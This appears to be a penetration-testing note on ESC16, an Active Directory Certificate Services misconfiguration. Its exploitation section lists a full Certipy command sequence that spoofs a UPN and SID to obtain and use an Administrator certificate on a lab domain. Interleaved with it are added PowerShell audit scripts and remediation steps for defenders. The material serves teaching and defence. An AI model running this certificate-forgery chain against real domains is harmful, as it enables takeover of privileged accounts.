ESC16

ABOUT

ESC16 is a misconfiguration of Active Directory Certificate Services in which the CA is globally configured (through the DisableExtensionList registry value, or because patches are missing) to omit the szOID_NTDS_CA_SECURITY_EXT SID extension from every certificate it issues. Without that extension there is no strong certificate-to-user mapping, so under certain conditions (DCs running in compatibility mode, or ESC16 combined with ESC6) an attacker can spoof a UPN or inject a SID in the SAN field and impersonate privileged accounts using forged certificates.

ESC6: Lets you inject your own UPN and SID into the SAN (Subject Alternative Name) field of a certificate request.

ESC16: The CA is misconfigured to not include the SID extension (szOID_NTDS_CA_SECURITY_EXT) in certificates.
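As an added example (not from the original notes and not Certipy's code), the following PowerShell audits the two CA settings the ESC6 and ESC16 descriptions above depend on, plus the DC-side mapping enforcement. It assumes the standard CA registry layout under CertSvc\Configuration (the Active value naming the CA, and DisableExtensionList / EditFlags under the default policy module) and the KB5014754 StrongCertificateBindingEnforcement value under the Kdc service key; the function names are mine. The CA checks are meant to run on the CA host and the KDC check on a domain controller.

```powershell
# Added audit example; not part of the original notes and not Certipy's code.
# Assumes: CA checks run locally on the CA host, the KDC check on a DC.

$SidExtensionOid               = '1.3.6.1.4.1.311.25.2'   # szOID_NTDS_CA_SECURITY_EXT
$EditfAttributeSubjectAltName2 = 0x00040000               # EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6)

# ESC16 / ESC6 check: does the CA strip the SID extension from every certificate,
# and does it honour caller-supplied SANs passed as request attributes?
function Test-CaSidExtensionConfig {
    $base   = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
    $caName = (Get-ItemProperty -Path $base -Name Active).Active
    $policy = Join-Path $base "$caName\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy"
    $props  = Get-ItemProperty -Path $policy

    # DisableExtensionList is a multi-string of OIDs the CA omits from issued certificates.
    $disabled  = @($props.DisableExtensionList)
    $editFlags = [int]$props.EditFlags

    [pscustomobject]@{
        CA                         = $caName
        Esc16_SidExtensionDisabled = ($disabled -contains $SidExtensionOid)
        Esc6_AttributeSanEnabled   = (($editFlags -band $EditfAttributeSubjectAltName2) -ne 0)
        DisableExtensionList       = ($disabled -join ',')
    }
}

# DC-side check: 0 = strong mapping disabled, 1 = compatibility mode (certificates
# without the SID extension are still accepted), 2 = full enforcement.
function Test-KdcStrongBinding {
    $kdc   = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc' -ErrorAction SilentlyContinue
    $value = $kdc.StrongCertificateBindingEnforcement
    $mode  = switch ($value) {
        0       { 'Disabled' }
        1       { 'Compatibility' }
        2       { 'FullEnforcement' }
        default { 'NotSet (OS default for the installed patch level)' }
    }
    [pscustomobject]@{
        StrongCertificateBindingEnforcement = $value
        Mode                                = $mode
        # Unknown when the value is absent: the default depends on the patch level.
        AcceptsCertsWithoutSid              = if ($null -eq $value) { $null } else { ($value -ne 2) }
    }
}

Test-CaSidExtensionConfig | Format-List
Test-KdcStrongBinding     | Format-List
```

A CA that reports Esc16_SidExtensionDisabled = True together with a KDC in Disabled or Compatibility mode is the condition the ABOUT section describes; fixing it means removing the OID from DisableExtensionList (certutil -setreg policy\DisableExtensionList -1.3.6.1.4.1.311.25.2, then restarting CertSvc) and moving DCs to full enforcement.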

EXPLOITATION

Certipy's docs describe a Scenario A and a Scenario B; this chain is a mix of both. The UPN update step comes from Scenario A, and requesting a certificate with our own UPN and SID comes from Scenario B.

Updating UPN

certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'Administrator' -user 'some_svc' update

Extracting Admin's SID

certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -user 'Administrator' read

Requesting valid Admin's cert

certipy req -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -target 'dc01.militech.local' -ca 'militech-DC01-CA' -template 'User' -upn 'administrator@militech.local' -sid 'S-1-5-21-...-500'

Updating back UPN

certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'some_svc' -user 'some_svc' update

Authenticating as Admin

certipy auth -pfx 'administrator.pfx' -username 'Administrator' -domain militech.local -dc-ip '13.13.13.13'
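Added example, not from the original notes and not Certipy's code: a PowerShell function that inspects an issued certificate (a .cer, or a .pfx with its password) for the two properties this chain relies on, the presence of the szOID_NTDS_CA_SECURITY_EXT extension and the UPN carried in the SAN. Defenders can run it over certificates exported from the CA database to confirm that issued certificates carry the SID binding and that the SAN UPN matches the account that requested them. The function and parameter names and the .\issued folder are my assumptions.

```powershell
# Added example; not part of the original notes and not Certipy's code.
# Inspects a certificate file for the SID extension and the SAN UPN.
function Get-CertIdentityBinding {
    param(
        [Parameter(Mandatory)][string]$Path,   # .cer or .pfx
        [string]$Password                       # only needed for a .pfx
    )
    $cert = if ($Password) {
        New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($Path, $Password)
    } else {
        New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($Path)
    }

    $sidExt = $cert.Extensions | Where-Object { $_.Oid.Value -eq '1.3.6.1.4.1.311.25.2' }  # szOID_NTDS_CA_SECURITY_EXT
    $sanExt = $cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' }             # subjectAltName

    # Format($true) renders the SAN as text, e.g. "Other Name: Principal Name=user@domain"
    # (the labels are localized, so adjust the regex on non-English systems).
    $sanText = if ($sanExt) { $sanExt.Format($true) } else { '' }
    $upn = if ($sanText -match 'Principal Name=([^\s,]+)') { $Matches[1] } else { $null }

    [pscustomobject]@{
        Subject         = $cert.Subject
        Issuer          = $cert.Issuer
        Thumbprint      = $cert.Thumbprint
        HasSidExtension = ($null -ne $sidExt)
        SanUpn          = $upn
        # Without the SID extension a DC can only map this certificate through its SAN,
        # which is the weak mapping the ESC16 chain above depends on.
        WeakMappingOnly = ($null -eq $sidExt)
    }
}

# Usage: every certificate in a folder, listing those that lack the SID binding.
Get-ChildItem -Path .\issued -Filter *.cer | ForEach-Object {
    Get-CertIdentityBinding -Path $_.FullName
} | Where-Object WeakMappingOnly | Format-Table Subject, SanUpn, Thumbprint -AutoSize
```

On a correctly configured CA every certificate issued from a user template should report HasSidExtension = True; a certificate where it is False and SanUpn names a different account than Subject is exactly the artifact the request step above produces and is worth correlating with the CA's request log for the requester identity.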
